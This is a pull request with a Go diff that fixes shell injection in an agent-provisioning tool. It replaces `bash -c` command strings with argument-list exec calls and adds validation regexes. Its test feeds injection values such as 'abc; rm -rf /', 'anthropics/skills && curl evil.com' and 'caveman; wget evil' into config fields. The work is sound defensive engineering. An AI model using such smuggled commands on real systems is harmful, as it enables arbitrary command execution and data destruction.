### PR TITLE
fix(provision): eliminate shell injection in InstallExtensions

### DIFF
--- a/internal/agent/manager.go
+++ b/internal/agent/manager.go
@@ -761,17 +761,22 @@ func InstallMarketplace(username string, m config.MarketplaceConfig) error {
 	marketplaceDir := filepath.Join(home, ".claude", "plugins", "marketplaces", m.Name)
 	knownPath := filepath.Join(home, ".claude", "plugins", "known_marketplaces.json")
 	if _, err := os.Stat(marketplaceDir); os.IsNotExist(err) {
-		cmd := exec.Command("sudo", "-iu", username, "bash", "-c",
-			fmt.Sprintf("mkdir -p ~/.claude/plugins/marketplaces && git clone https://github.com/%s.git %s", m.Repo, marketplaceDir))
-		if out, err := cmd.CombinedOutput(); err != nil {
+		parentDir := filepath.Join(home, ".claude", "plugins", "marketplaces")
+		if out, err := exec.Command("sudo", "-iu", username, "mkdir", "-p", parentDir).CombinedOutput(); err != nil {
+			return fmt.Errorf("creating marketplace dir for %s: %w\n%s", username, err, out)
+		}
+		cloneURL := "https://github.com/" + m.Repo + ".git"
+		if out, err := exec.Command("sudo", "-iu", username, "git", "clone", cloneURL, marketplaceDir).CombinedOutput(); err != nil {
 			return fmt.Errorf("cloning marketplace %s for %s: %w\n%s", m.Name, username, err, out)
 		}
 	}
 	if m.Commit != "" {
-		cmd := exec.Command("sudo", "-iu", username, "bash", "-c",
-			fmt.Sprintf("git -C %s rev-parse HEAD | grep -q '^%s'", marketplaceDir, m.Commit))
-		if out, err := cmd.CombinedOutput(); err != nil {
-			return fmt.Errorf("marketplace %s HEAD does not match pinned commit %s for %s:\n%s", m.Name, m.Commit, username, out)
+		out, err := exec.Command("sudo", "-iu", username, "git", "-C", marketplaceDir, "rev-parse", "HEAD").CombinedOutput()
+		if err != nil {
+			return fmt.Errorf("reading HEAD for marketplace %s: %w\n%s", m.Name, err, out)
+		}
+		if !strings.HasPrefix(strings.TrimSpace(string(out)), m.Commit) {
+			return fmt.Errorf("marketplace %s HEAD does not match pinned commit %s for %s: got %s", m.Name, m.Commit, username, strings.TrimSpace(string(out)))
 		}
 	}
 	var known map[string]json.RawMessage
@@ -802,17 +807,14 @@ func InstallMarketplace(username string, m config.MarketplaceConfig) error {
 
 // installPlugin installs and enables a plugin from the named marketplace. Idempotent.
 func installPlugin(username, pluginName, marketplaceName string) error {
-	cmd := exec.Command("sudo", "-iu", username, "bash", "-c",
-		fmt.Sprintf("claude plugin install %s@%s 2>&1; claude plugin enable %s@%s 2>&1; true",
-			pluginName, marketplaceName, pluginName, marketplaceName))
-	out, err := cmd.CombinedOutput()
-	if err != nil {
-		return fmt.Errorf("plugin %s@%s for %s: %w\n%s", pluginName, marketplaceName, username, err, out)
+	ref := pluginName + "@" + marketplaceName
+	installOut, _ := exec.Command("sudo", "-iu", username, "claude", "plugin", "install", ref).CombinedOutput()
+	if !strings.Contains(string(installOut), "Successfully installed plugin") && !strings.Contains(string(installOut), "already installed") {
+		return fmt.Errorf("plugin %s install did not confirm success for %s:\n%s", ref, username, installOut)
 	}
-	output := string(out)
-	if !(strings.Contains(output, "Successfully installed plugin") || strings.Contains(output, "already installed")) ||
-		!(strings.Contains(output, "Successfully enabled plugin") || strings.Contains(output, "already enabled")) {
-		return fmt.Errorf("plugin %s@%s install/enable did not confirm success for %s:\n%s", pluginName, marketplaceName, username, output)
+	enableOut, _ := exec.Command("sudo", "-iu", username, "claude", "plugin", "enable", ref).CombinedOutput()
+	if !strings.Contains(string(enableOut), "Successfully enabled plugin") && !strings.Contains(string(enableOut), "already enabled") {
+		return fmt.Errorf("plugin %s enable did not confirm success for %s:\n%s", ref, username, enableOut)
 	}
 	return nil
 }
@@ -822,9 +824,12 @@ func installPlugin(username, pluginName, marketplaceName string) error {
 func InstallSkill(username string, s config.SkillConfig) error {
 	skillDir := filepath.Join(fmt.Sprintf("/home/%s", username), ".claude", "skills", s.Name)
 	if _, err := os.Stat(skillDir); os.IsNotExist(err) {
-		cmd := exec.Command("sudo", "-iu", username, "bash", "-c",
-			fmt.Sprintf("mkdir -p ~/.claude/skills && git clone https://github.com/%s.git %s", s.Repo, skillDir))
-		if out, err := cmd.CombinedOutput(); err != nil {
+		parentDir := filepath.Join(fmt.Sprintf("/home/%s", username), ".claude", "skills")
+		if out, err := exec.Command("sudo", "-iu", username, "mkdir", "-p", parentDir).CombinedOutput(); err != nil {
+			return fmt.Errorf("creating skills dir for %s: %w\n%s", username, err, out)
+		}
+		cloneURL := "https://github.com/" + s.Repo + ".git"
+		if out, err := exec.Command("sudo", "-iu", username, "git", "clone", cloneURL, skillDir).CombinedOutput(); err != nil {
 			return fmt.Errorf("cloning skill %s for %s: %w\n%s", s.Name, username, err, out)
 		}
 	}

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -23,6 +23,16 @@ var githubLoginRe = regexp.MustCompile(`^[a-zA-Z0-9-]{1,39}$`)
 // vaultRefRe matches ${vault:BUCKET.KEY} in MCP server env values.
 var vaultRefRe = regexp.MustCompile(`\$\{vault:([^.}]+)\.([^}]+)\}`)
 
+// extensionNameRe allows alphanumeric names with dots, hyphens, and underscores.
+// Rejects semicolons, spaces, backticks, and other shell-special characters.
+var extensionNameRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._-]*$`)
+
+// extensionRepoRe requires owner/repo format with safe characters only.
+var extensionRepoRe = regexp.MustCompile(`^[a-zA-Z0-9._-]+/[a-zA-Z0-9._-]+$`)
+
+// commitHashRe accepts hex SHA strings (full or prefix).
+var commitHashRe = regexp.MustCompile(`^[0-9a-fA-F]+$`)
+
 // OperatorConfig identifies the humans who are trusted to issue instructions
 // to agents via Discord or GitHub. Provisioned agents use these IDs in the
 // generated prompt so no operator ID is hardcoded in clem source.
@@ -446,10 +456,36 @@ func (ac *AgentConfig) validateExtensions(key string) error {
 		if mp.Name == "" || mp.Repo == "" {
 			return fmt.Errorf("agent %s: marketplace entry missing name or repo", key)
 		}
+		if !extensionNameRe.MatchString(mp.Name) {
+			return fmt.Errorf("agent %s: marketplace name %q contains invalid characters", key, mp.Name)
+		}
+		if !extensionRepoRe.MatchString(mp.Repo) {
+			return fmt.Errorf("agent %s: marketplace repo %q is not a valid owner/repo", key, mp.Repo)
+		}
+		if mp.Commit != "" && !commitHashRe.MatchString(mp.Commit) {
+			return fmt.Errorf("agent %s: marketplace commit %q is not a valid hex hash", key, mp.Commit)
+		}
+	}
+	for _, pl := range ac.Extensions.Plugins {
+		if pl.Name == "" || pl.Marketplace == "" {
+			return fmt.Errorf("agent %s: plugin entry missing name or marketplace", key)
+		}
+		if !extensionNameRe.MatchString(pl.Name) {
+			return fmt.Errorf("agent %s: plugin name %q contains invalid characters", key, pl.Name)
+		}
+		if !extensionNameRe.MatchString(pl.Marketplace) {
+			return fmt.Errorf("agent %s: plugin marketplace %q contains invalid characters", key, pl.Marketplace)
+		}
 	}
 	for _, sk := range ac.Extensions.Skills {
 		if sk.Name == "" || sk.Repo == "" {
 			return fmt.Errorf("agent %s: skill entry missing name or repo", key)
+		}
+		if !extensionNameRe.MatchString(sk.Name) {
+			return fmt.Errorf("agent %s: skill name %q contains invalid characters", key, sk.Name)
+		}
+		if !extensionRepoRe.MatchString(sk.Repo) {
+			return fmt.Errorf("agent %s: skill repo %q is not a valid owner/repo", key, sk.Repo)
 		}
 	}
 	for _, mcp := range ac.Extensions.MCPServers {

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -556,6 +556,88 @@ agents:
 	}
 }
 
+func TestLoad_ExtensionsRejectShellInjection(t *testing.T) {
+	header := `
+project: myteam
+coordination:
+  backend: discord
+  server_id: "1"
+  channels: {general: "g"}
+agents:
+  lead:
+    name: "Lead"
+    model: "claude-sonnet-4-6"
+    extensions:
+`
+	cases := []struct {
+		name string
+		ext  string
+	}{
+		{"marketplace name with semicolon", `
+      marketplaces:
+        - name: "caveman; touch /tmp/injected"
+          source: github
+          repo: JuliusBrussee/caveman
+`},
+		{"marketplace name with space", `
+      marketplaces:
+        - name: "caveman mode"
+          source: github
+          repo: JuliusBrussee/caveman
+`},
+		{"marketplace repo with semicolon", `
+      marketplaces:
+        - name: caveman
+          source: github
+          repo: "JuliusBrussee/caveman; touch /tmp/x"
+`},
+		{"marketplace repo missing slash", `
+      marketplaces:
+        - name: caveman
+          source: github
+          repo: "notarepo"
+`},
+		{"marketplace commit non-hex", `
+      marketplaces:
+        - name: caveman
+          source: github
+          repo: JuliusBrussee/caveman
+          commit: "abc; rm -rf /"
+`},
+		{"skill name with backtick", `
+      skills:
+        - name: "skill` + "`" + `bad"
+          source: github
+          repo: anthropics/skills
+`},
+		{"skill repo with injection", `
+      skills:
+        - name: security
+          source: github
+          repo: "anthropics/skills && curl evil.com"
+`},
+		{"plugin name with semicolon", `
+      plugins:
+        - name: "bad;plugin"
+          marketplace: caveman
+`},
+		{"plugin marketplace with injection", `
+      plugins:
+        - name: caveman
+          marketplace: "caveman; wget evil"
+`},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			path := writeYAML(t, header+tc.ext)
+			_, err := Load(path)
+			if err == nil {
+				t.Fatalf("expected validation error for %q, got nil", tc.name)
+			}
+		})
+	}
+}
+
 func TestExpandVaultRefs(t *testing.T) {
 	secrets := map[string]string{
 		"DISCORD_TOKEN": "tok123",


### PR DESCRIPTION
Closes #97. Closes #90.

## Problem

`InstallMarketplace`, `installPlugin`, and `InstallSkill` built shell command strings via `fmt.Sprintf` and passed them to `bash -c`. Values from `clem.yaml` (`marketplace.name`, `marketplace.repo`, `skill.name`, `skill.repo`, `plugin.name`, `plugin.marketplace`) were inserted verbatim, allowing any value containing `;`, `&&`, or backticks to execute arbitrary commands as `agentuser`.

## Fix

**`internal/agent/manager.go`** — all three functions now use `exec.Command` with individual arguments instead of `bash -c`:
- `InstallMarketplace`: separate `mkdir -p` and `git clone` exec calls; commit check reads HEAD with `git rev-parse HEAD` and uses `strings.HasPrefix` rather than piping to `grep -q`.
- `installPlugin`: two separate `claude plugin install` / `claude plugin enable` exec calls (no shell).
- `InstallSkill`: separate `mkdir -p` and `git clone` exec calls.

**`internal/config/config.go`** — `validateExtensions` now checks `name`, `repo`, and `commit` fields in marketplaces, skills, and plugins against allowlist regexes (`extensionNameRe`, `extensionRepoRe`, `commitHashRe`) at `Load()` time, so a malformed config is rejected before provision runs. This also fixes #90 (plugin entries had no validation loop prior to this change).

## Tests

`TestLoad_ExtensionsRejectShellInjection` in `config_test.go` covers nine injection vectors across marketplace name/repo/commit, skill name/repo, and plugin name/marketplace fields — all must fail `Load()`.